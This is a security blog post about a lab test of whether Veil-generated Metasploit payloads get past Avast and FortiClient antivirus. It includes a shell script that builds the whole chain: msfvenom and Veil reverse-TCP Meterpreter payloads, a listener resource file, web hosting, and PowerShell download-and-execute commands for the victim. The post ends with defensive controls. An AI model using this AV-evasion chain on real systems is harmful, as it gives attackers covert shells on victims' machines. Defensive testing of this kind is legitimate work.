Question. If an attacker can convince a user to download and run a malicious binary, script, or office document, how easy is it to bypass a common anti-virus program and obtain an initial foothold in an organization (i.e. a shell)?
Thoughts & Experiment. I believe this is a very important question; in my experience it is very easy for an attacker to phish a user and have them download and execute an office document or an executable (anyone want to disagree with this assessment?). Given this human vulnerability, let's take a look at Veil, a tool created by Chris Truncer that generates payloads designed to bypass common anti-virus solutions and connect back to the Metasploit Framework (a very powerful exploitation / post-exploitation application). We will use it to generate some payloads and see whether a few common anti-virus programs catch them before they execute. If you want to play along at home you will need to install the following.
Linux Box with:
- Veil (https://github.com/Veil-Framework/Veil)
- Metasploit Framework (the version bundled with Kali Linux is the easy route, or https://github.com/rapid7/metasploit-framework)
Windows Box with:
- Your preferred anti-virus installation (in my demonstration I'm going to use Avast and FortiClient)
Watch this experiment play out in the video I created (av-evasion walkthrough), and if you have the pieces set up at home, follow along.
Below are the steps to run through to produce similar results (steps 1 through 6 are covered in the video). This list is helpful if you want to step through it a piece at a time.
1. Set up your test environment (the AV product to test, a Veil install, a Metasploit install).
2. Generate a standard Metasploit payload with msfvenom. This one should be caught by the AV programs; it is the control that proves they are actually working.
3. Configure and generate a Veil-Evasion payload that, when run, connects back to Metasploit (this one may not be caught by the AV programs tested).
4. Set up a Metasploit multi/handler listener to wait for the reverse connection.
5. Host the two payloads so the target Windows machines can download them (e.g. Python's built-in web server: the "SimpleHTTPServer" module on Python 2, "http.server" on Python 3).
6. Download and execute the binaries on the Windows test machines.
7. If the Veil payload runs and connects back, we have evaded AV and now have a shell on the target machine.
8. From there, check out some of my post-exploitation posts to see what damage is possible once an attacker has a shell.
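To make the attacker-side half of those steps concrete, here is an added lab script (it is not code from the original post, from Veil, or from Metasploit). It assumes a Kali box at 192.168.56.10 listening on port 4444 and a staging directory under /tmp; the Veil command line follows Veil 3's `./Veil.py -t Evasion -p <payload> --ip ... --port ... -o <name>` interface, which is an assumption you should check against `./Veil.py --help` on your install. The script does not run msfvenom, Veil or msfconsole itself; it only builds the commands and the handler resource file so the whole plan can be reviewed before anything touches the lab.

```shell
#!/bin/sh
# Added example, not from the original post or the Veil/Metasploit projects.
# Assumed lab values (override with environment variables): attacker at
# 192.168.56.10, handler on 4444, files staged under /tmp/av-lab-www.
LHOST="${LHOST:-192.168.56.10}"
LPORT="${LPORT:-4444}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
WWW="${WWW:-/tmp/av-lab-www}"

# Step 2: baseline msfvenom binary. Plain unencoded Meterpreter is the control
# sample: if the AV under test does not flag this, the test bed is broken.
baseline_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s/baseline.exe\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$WWW"
}

# Step 3: Veil-Evasion payload wrapping the same Meterpreter stager.
# Assumed Veil 3 CLI; the compiled .exe lands in Veil's own output directory
# and must then be copied into $WWW next to baseline.exe.
veil_cmd() {
    printf './Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip %s --port %s -o veil_rev_tcp\n' \
        "$LHOST" "$LPORT"
}

# Step 4: msfconsole resource file for the listener. Pinning PAYLOAD, LHOST and
# LPORT here avoids the classic mismatch where the binary calls back to a port
# nobody is listening on. ExitOnSession false keeps the handler alive after the
# first shell so several test machines can connect to the same listener.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
    printf 'msfconsole -q -r %s\n' "$rc"
}

# Step 5: serve the staging directory. Python 3 renamed the Python 2
# SimpleHTTPServer module to http.server; pick whichever is installed.
hosting_cmd() {
    if command -v python3 >/dev/null 2>&1; then
        printf 'cd %s && python3 -m http.server 80\n' "$WWW"
    else
        printf 'cd %s && python -m SimpleHTTPServer 80\n' "$WWW"
    fi
}

# Step 6: what gets typed on the Windows box (PowerShell). Hash both files
# before running them so each AV verdict can later be tied to an exact sample.
victim_cmds() {
    printf 'Invoke-WebRequest http://%s/baseline.exe -OutFile baseline.exe\n' "$LHOST"
    printf 'Invoke-WebRequest http://%s/veil_rev_tcp.exe -OutFile veil_rev_tcp.exe\n' "$LHOST"
    printf 'Get-FileHash .\\baseline.exe, .\\veil_rev_tcp.exe -Algorithm SHA256\n'
    printf '.\\baseline.exe     # control: expected to be blocked by AV\n'
    printf '.\\veil_rev_tcp.exe # may run and call back to the handler\n'
}

# Print the full plan in the order the steps are executed.
print_plan() {
    mkdir -p "$WWW"
    echo "## attacker: baseline payload"; baseline_cmd
    echo "## attacker: Veil payload";     veil_cmd
    echo "## attacker: handler";          write_handler_rc "$WWW/handler.rc"
    echo "## attacker: hosting";          hosting_cmd
    echo "## victim (PowerShell)";        victim_cmds
}

print_plan
```

Run it once to get the command list and the generated handler.rc, then execute the attacker commands in separate terminals (the handler and the web server both block). Keeping the handler in a resource file is worth the habit even outside a lab: the payload name, host and port that Veil was given and the ones the listener uses must match exactly, and a file you can diff makes that mismatch obvious.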
There you have it: using open source tools it is possible to quickly create malware that bypasses AV. Try this process with the AV products you use and share your results with us! If you have questions, feel free to post those as well.
The So What. If bypassing signature (blacklist) based AV can happen this quickly and easily, what controls could or should be put in place to provide better protection against targeted malware? The big one in my opinion is application whitelisting: only approved applications are allowed to run, rather than trying to enumerate what cannot be run (blacklisting). Another useful control is preventing users from downloading executables (and other dangerous file types) from the Internet; to do this properly you need SSL/TLS inspection, since a download over HTTPS is otherwise opaque to the filtering proxy. Anyone have experience putting these technologies in place? If so, let us know how the implementations went for your organization and what tools worked best for you. I know these solutions can be quite difficult to get right and it would be good to hear techniques and tips from the community.
Thanks for following along and participating. FYI, my next post will dive into some post-exploitation topics, expanding on what an attacker can do now that they have a shell. Stay tuned!